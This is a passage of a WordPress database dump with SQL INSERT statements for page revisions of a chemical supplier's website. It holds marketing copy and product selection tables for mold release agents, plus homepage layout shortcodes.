110%;">Highly Filled Elastomer</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><span style="color: #0000ff;"><strong>ReleaSys 8500</strong></span></a></span></td>\r\n<td><span style="font-size: 110%;">• Instant Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Release most compounds</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Rubber to Metal Bonding</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">-</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/dry-film-release-agents/"><span style="color: #0000ff;"><strong>ReleaSys 8200</strong></span></a></span></td>\r\n<td><span style="font-size: 110%;">• Multiple releases</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• No transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• High Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Rubber to Metal Bonding</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">-</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/"><span style="color: #0000ff;"><strong>MS-122AV</strong></span></a></span></td>\r\n<td><span style="font-size: 110%;">• Maximized Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Quick Dry; Instant Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• No Transfer</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/troubleshooting-common-mold-release-issues/">For any questions about proper application of our mold release products please view our article which discusses this process</a></strong></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n</ul>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Rubber & Silicone Mold Release Agents | Miller-Stephenson', '', 'inherit', 'closed', 'closed', '', '2886-revision-v1', '', '', '2016-11-04 19:57:58', '2016-11-04 19:57:58', '', 2886, 'https://www.miller-stephenson.com/2886-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2903, 3, '2016-11-04 19:58:36', '2016-11-04 19:58:36', '<hr />\r\n\r\n<h1 style="text-align: center;">High Performance, Specialized Mold Release Agents for Polyurethane Molding</h1>\r\n<span style="font-size: 105%;">Miller-Stephenson offers the most technologically advanced polyurethane molding release agents solutions, back by over 40 years of research and development and technical expertise.  Our mold release agents and are relied upon by global industries to ensure efficient, cost effective, and high quality release of their molded parts.  Large and small manufacturers can expect higher productivity and profitability through reduced downtime, increased acceptance rates and improved part quality when switching to <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson’s ReleaSys semi-permanent line</a>.  We offer both water and solvent formulations that are 100% non-flammable, low odor, and low VOC.  Miller-Stephenson\'s specialized Polyurethane mold release agents offer customer the following benefits:</span>\r\n<ul>\r\n 	<li><span style="font-size: 105%;"><strong><span style="text-decoration: underline;">Superior part release:</span> </strong>Our <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">ReleaSys</a> product is formulated to maximize releases per applications and optimize part quality.  This means reduced down time and fewer defects, regardless of the polyurethane molding operation.</span></li>\r\n 	<li><span style="font-size: 105%;"><span style="text-decoration: underline;"><strong>Minimal Transfer:</strong></span> Our customized polyurethane mold release agents are designed to crosslink forming a robust, durable film on the mold surface which results in minimal transfer to our part. This means any secondary operations, such as painting or gluing are not effected, reducing the need for time-wasting clean-up.</span></li>\r\n 	<li><span style="font-size: 105%;"><span style="text-decoration: underline;"><strong>Lower defect rates:</strong></span> Miller-Stephenson\'s formulations are perfectly balanced, provide optimal surface slip, durability, and minimal build-up.  Molded parts are therefore manufactured more consistently and with high efficiency</span></li>\r\n 	<li><span style="font-size: 105%;"><strong><span style="text-decoration: underline;">Higher quality parts:</span></strong> Miller-Stephenson has developed specialized formulation to exceed all urethane molding requirements. This results in a product line lower build-up on tooling and less sticky, greasy residues making for higher quality parts and lower rejection rates.</span></li>\r\n 	<li><span style="font-size: 105%;"><span style="text-decoration: underline;"><strong>Less downtime / Higher efficiency:</strong></span> ReleaSys was designed to maximize releases per applications and minimize mold fouling, which ultimately leads to less time spend applying mold release agents and less time cleaning up the residue lesser release agents leave behind.</span></li>\r\n 	<li><span style="font-size: 105%;"><strong><span style="text-decoration: underline;">Water-based, no/low VOC emissions, cleaner safer working environments:</span></strong> In regions that have strict VOC regulations and air quality permitting, or if your company require products that are safer and have no odor, Miller-Stephenson has developed a portfolio of products that are<a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"> water-based, low VOC or VOC-free</a>. Not only do these products provide you with a solution to lowering your VOC output, they also provide optimal performance just like the solvent-based products you’re used to.</span></li>\r\n 	<li><span style="font-size: 105%;"><span style="text-decoration: underline;"><strong>Optimized surface finish:</strong></span><strong> </strong>ReleaSys Polyurethane mold release agents are formulated to provide a variety of surface finishes.  From high gloss, matte, or 100% dry we have a specialized formulations to meet your needs. Our solutions can meet your surface finish specifications without the greasy and oily residues left behind by other mold release agents.</span></li>\r\n</ul>\r\n<h2><span style="text-decoration: underline;"><strong><span style="font-size: 105%;">Application Guide for Polyurethane Mold Relea</span>se Agents :</strong></span></h2>\r\n<span style="text-decoration: underline; font-size: 105%;">Rigid Polyurethane (PU) Foam</span>\r\n<ul>\r\n 	<li><span style="font-size: 105%;">Automotive and Recreational seating</span></li>\r\n 	<li><span style="font-size: 105%;">Guards and Cushioning equipment</span></li>\r\n 	<li><span style="font-size: 105%;">Sporting and Safety equipment (helment, shoulder pads)</span></li>\r\n</ul>\r\n<span style="text-decoration: underline; font-size: 105%;">Open Cell Polyurethane (PU) Foam</span>\r\n<ul>\r\n 	<li><span style="font-size: 105%;">Pillows and Mattresses</span></li>\r\n 	<li><span style="font-size: 105%;">Insulation</span></li>\r\n</ul>\r\n<span style="text-decoration: underline; font-size: 105%;">Thermoplastic Resins / Coatings</span>\r\n<ul>\r\n 	<li><span style="font-size: 105%;">Bowling pins</span></li>\r\n 	<li><span style="font-size: 105%;">Golf carts</span></li>\r\n 	<li><span style="font-size: 105%;">Automotive Dashboards</span></li>\r\n</ul>\r\n<h1><strong><span style="text-decoration: underline;">Selection Guide:</span></strong></h1>\r\n<table style="height: 284px;" width="769">\r\n<tbody>\r\n<tr>\r\n<td width="105">\r\n<h3 style="text-align: center;"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong>Product</strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="153">\r\n<h3><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong>Carrier Solvent </strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="136">\r\n<h3><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong>Finish </strong></span></span></h3>\r\n</td>\r\n<td width="135">\r\n<h3 style="text-align: center;"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong>Description</strong></span></span></h3>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 140%; color: #0000ff;"><strong><a style="color: #0000ff;" href="https://www.miller-stephenson.com/product/composite-mold-release-agent/">ReleaSys 8800</a></strong></span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Matte</span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Highest Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;"> Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Rapid Cure (1-2 min)</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 140%; color: #0000ff;"><strong><a style="color: #0000ff;" href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/">ReleaSys 8500</a></strong></span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Matte</span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Medium Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">No Transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Immediate Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 140%; color: #0000ff;"><strong><a style="color: #0000ff;" href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/">ReleaSys 8900</a></strong></span></td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 120%;">Solvent-based</span></td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 120%;">Matte - Semigloss</span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">High Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Fast Dry and Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">High Durability</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/troubleshooting-common-mold-release-issues/">For any questions about proper application of our mold release products please view our article which discusses this process</a></strong></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n</ul>\r\n&nbsp;', 'Polyurethane Mold Release Agents | Miller-Stephenson', '', 'inherit', 'closed', 'closed', '', '2869-revision-v1', '', '', '2016-11-04 19:58:36', '2016-11-04 19:58:36', '', 2869, 'https://www.miller-stephenson.com/2869-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2904, 0, '2016-11-04 20:28:36', '2016-11-04 20:28:36', '', '', '', 'publish', 'closed', 'closed', '', '2904', '', '', '2016-11-04 20:28:36', '2016-11-04 20:28:36', '', 0, 'https://www.miller-stephenson.com/nf_sub/2904/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2909, 1, '2017-06-20 16:58:56', '0000-00-00 00:00:00', '', 'Choose a Release Agent', '', 'draft', 'closed', 'closed', '', '', '', '', '2017-06-20 16:58:56', '2017-06-20 16:58:56', '', 0, 'https://www.miller-stephenson.com/?post_type=decision_tree&#038;p=2909', 0, 'decision_tree', '', 0); 
INSERT INTO `wp_posts` VALUES (2910, 1, '2016-11-06 17:18:44', '2016-11-06 17:18:44', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="85"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\n\n[/text_box]\n[text_box position_y="20"]\n\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Quality &amp; Service</span></em></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="503px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="100" position_y="0"]\n\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="284px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="322px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="80" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY &amp; CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n\n[/ux_banner_grid]\n[row]\n\n[col]\n\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Large Inventory</h3>\n<p>With four fully stocked USA and Canadian locations, we are committed to ensuring that our customers can count on swift delivery.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Low Global Warming</h3>\n<p>In response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.</p>\n\n[/col]\n\n[/row]\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n<h1><strong>ReleaSys </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2205" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2206"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1588"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2243"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2208"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1995"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n<p>&nbsp;</p>', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-11-06 17:18:44', '2016-11-06 17:18:44', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2911, 1, '2016-11-06 17:20:33', '2016-11-06 17:20:33', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="85"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\n\n[/text_box]\n[text_box position_y="20"]\n\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Quality &amp; Service</span></em></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="503px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\n\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="284px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="322px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="80" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY &amp; CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n\n[/ux_banner_grid]\n[row]\n\n[col]\n\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Large Inventory</h3>\n<p>With four fully stocked USA and Canadian locations, we are committed to ensuring that our customers can count on swift delivery.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Low Global Warming</h3>\n<p>In response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.</p>\n\n[/col]\n\n[/row]\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n<h1><strong>ReleaSys </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2205" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2206"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1588"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2243"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2208"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1995"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n<p>&nbsp;</p>', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-11-06 17:20:33', '2016-11-06 17:20:33', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2912, 0, '2016-11-07 08:15:09', '2016-11-07 08:15:09', '', '', '', 'publish', 'closed', 'closed', '', '2912', '', '', '2016-11-07 08:15:09', '2016-11-07 08:15:09', '', 0, 'https://www.miller-stephenson.com/nf_sub/2912/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2915, 3, '2016-11-07 13:33:59', '2016-11-07 13:33:59', '<hr />\r\n\r\n<h1 style="text-align: center;">High Performance, Specialized Mold Release Agents for Polyurethane Molding</h1>\r\n<span style="font-size: 105%;">Miller-Stephenson offers the most technologically advanced polyurethane molding release agents solutions, back by over 40 years of research, development and technical expertise.  Our mold release agents and are relied upon by global industries to ensure efficient, cost effective, and high quality release of their molded parts.  Large and small manufacturers can expect higher productivity and profitability through reduced downtime, increased acceptance rates and improved part quality when switching to <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson’s ReleaSys semi-permanent line</a>.  We offer both water and solvent formulations that are 100% non-flammable, low odor, and low VOC.  Miller-Stephenson\'s specialized Polyurethane mold release agents offer customer the following benefits:</span>\r\n<ul>\r\n 	<li><span style="font-size: 105%;"><strong><span style="text-decoration: underline;">Superior part release:</span> </strong>Our <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">ReleaSys</a> product is formulated to maximize releases per applications and optimize part quality.  This means reduced down time and fewer defects, regardless of the polyurethane molding operation.</span></li>\r\n 	<li><span style="font-size: 105%;"><span style="text-decoration: underline;"><strong>Minimal Transfer:</strong></span> Our customized polyurethane mold release agents are designed to crosslink forming a robust, durable film on the mold surface which results in minimal transfer to our part. This means any secondary operations, such as painting or gluing are not effected, reducing the need for time-wasting clean-up.</span></li>\r\n 	<li><span style="font-size: 105%;"><span style="text-decoration: underline;"><strong>Lower defect rates:</strong></span> Miller-Stephenson\'s formulations are perfectly balanced, provide optimal surface slip, durability, and minimal build-up.  Molded parts are therefore manufactured more consistently and with high efficiency</span></li>\r\n 	<li><span style="font-size: 105%;"><strong><span style="text-decoration: underline;">Higher quality parts:</span></strong> Miller-Stephenson has developed specialized formulation to exceed all urethane molding requirements. This results in a product line lower build-up on tooling and less sticky, greasy residues making for higher quality parts and lower rejection rates.</span></li>\r\n 	<li><span style="font-size: 105%;"><span style="text-decoration: underline;"><strong>Less downtime / Higher efficiency:</strong></span> ReleaSys was designed to maximize releases per applications and minimize mold fouling, which ultimately leads to less time spend applying mold release agents and less time cleaning up the residue lesser release agents leave behind.</span></li>\r\n 	<li><span style="font-size: 105%;"><strong><span style="text-decoration: underline;">Water-based, no/low VOC emissions, cleaner safer working environments:</span></strong> In regions that have strict VOC regulations and air quality permitting, or if your company require products that are safer and have no odor, Miller-Stephenson has developed a portfolio of products that are<a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"> water-based, low VOC or VOC-free</a>. Not only do these products provide you with a solution to lowering your VOC output, they also provide optimal performance just like the solvent-based products you’re used to.</span></li>\r\n 	<li><span style="font-size: 105%;"><span style="text-decoration: underline;"><strong>Optimized surface finish:</strong></span><strong> </strong>ReleaSys Polyurethane mold release agents are formulated to provide a variety of surface finishes.  From high gloss, matte, or 100% dry we have a specialized formulations to meet your needs. Our solutions can meet your surface finish specifications without the greasy and oily residues left behind by other mold release agents.</span></li>\r\n</ul>\r\n<h2><span style="text-decoration: underline;"><strong><span style="font-size: 105%;">Application Guide for Polyurethane Mold Relea</span>se Agents :</strong></span></h2>\r\n<span style="text-decoration: underline; font-size: 105%;">Rigid Polyurethane (PU) Foam</span>\r\n<ul>\r\n 	<li><span style="font-size: 105%;">Automotive and Recreational seating</span></li>\r\n 	<li><span style="font-size: 105%;">Guards and Cushioning equipment</span></li>\r\n 	<li><span style="font-size: 105%;">Sporting and Safety equipment (helment, shoulder pads)</span></li>\r\n</ul>\r\n<span style="text-decoration: underline; font-size: 105%;">Open Cell Polyurethane (PU) Foam</span>\r\n<ul>\r\n 	<li><span style="font-size: 105%;">Pillows and Mattresses</span></li>\r\n 	<li><span style="font-size: 105%;">Insulation</span></li>\r\n</ul>\r\n<span style="text-decoration: underline; font-size: 105%;">Thermoplastic Resins / Coatings</span>\r\n<ul>\r\n 	<li><span style="font-size: 105%;">Bowling pins</span></li>\r\n 	<li><span style="font-size: 105%;">Golf carts</span></li>\r\n 	<li><span style="font-size: 105%;">Automotive Dashboards</span></li>\r\n</ul>\r\n<h1><strong><span style="text-decoration: underline;">Selection Guide:</span></strong></h1>\r\n<table style="height: 284px;" width="769">\r\n<tbody>\r\n<tr>\r\n<td width="105">\r\n<h3 style="text-align: center;"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong>Product</strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="153">\r\n<h3><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong>Carrier Solvent </strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="136">\r\n<h3><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong>Finish </strong></span></span></h3>\r\n</td>\r\n<td width="135">\r\n<h3 style="text-align: center;"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong>Description</strong></span></span></h3>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 140%; color: #0000ff;"><strong><a style="color: #0000ff;" href="https://www.miller-stephenson.com/product/composite-mold-release-agent/">ReleaSys 8800</a></strong></span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Matte</span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Highest Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;"> Minimal 